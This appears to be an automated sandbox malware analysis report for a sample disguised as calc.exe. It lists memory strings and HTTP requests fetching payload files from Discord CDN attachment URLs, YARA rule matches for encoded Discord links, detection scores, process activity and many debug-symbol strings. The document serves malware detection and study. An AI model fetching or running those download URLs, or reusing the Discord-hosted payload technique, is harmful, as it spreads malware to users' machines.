Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972237
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722370
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972237076
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722370764
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972237076495
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722370764951
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972237076495156
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722370764951560
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972285
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722859
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972285953
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722859531
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972285953181
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722859531812
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972285953181245
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722859531812455
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/a
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/as
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/asc
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/asci
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_A
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_AR
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.t
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.tx
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.txt
Source: calc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897402450376536075/897465559711633408/8NMrqq.txt
Source: calc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.comD8
Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
Source: global trafficHTTP traffic detected: GET /attachments/897402450376536075/897465559711633408/8NMrqq.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/897223707649515602/897228595318124554/ascii_ART.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Host: cdn.discordapp.com
Source: unknownHTTPS traffic detected: -> version: TLS 1.2

System Summary:

Found detection on Joe Sandbox Cloud Basic with higher scoreShow sources
Source: calc.exeJoe Sandbox Cloud Basic: Detection: malicious Score: 72Perma Link
Source: calc.exe, type: SAMPLEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.calc.exe.320000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.calc.exe.320000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.calc.exe.320000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.calc.exe.320000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.252642988.0000000000322000.00000002.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000002.291985012.0000000000322000.00000002.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.245005606.0000000000322000.00000002.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.254525892.0000000002677000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.254621493.00000000026D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000002.293367777.00000000026D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.253884839.0000000000322000.00000002.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.253255248.0000000002677000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: calc.exe PID: 2952, type: MEMORYSTRMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: WerFault.exe PID: 5944, type: MEMORYSTRMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\Desktop\calc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 2104
Source: calc.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: calc.exeVirustotal: Detection: 54%
Source: calc.exeReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\calc.exeFile read: C:\Users\user\Desktop\calc.exeJump to behavior
Source: calc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\calc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\calc.exe 'C:\Users\user\Desktop\calc.exe'
Source: C:\Users\user\Desktop\calc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\calc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 2104
Source: C:\Users\user\Desktop\calc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3100:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2952
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DC6.tmpJump to behavior
Source: classification engineClassification label: mal80.evad.winEXE@3/7@1/2
Source: C:\Users\user\Desktop\calc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\calc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\calc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: calc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: calc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.260801117.0000000002F4D000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb& source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb2 source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb4 source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdbh source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: rasadhlp.pdb~ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbT3Rm source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbHL source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: mscoree.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb:0 source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb= source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000005.00000003.260801117.0000000002F4D000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: kDC:\Users\user\Desktop\calc.pdb source: calc.exe, 00000000.00000000.252775219.00000000006F8000.00000004.00000001.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: winhttp.pdbZ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.pdbMZ@ source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdbd source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbG source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.260565634.0000000002F42000.00000004.00000001.sdmp
Source: Binary string: wmswsock.pdbV source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
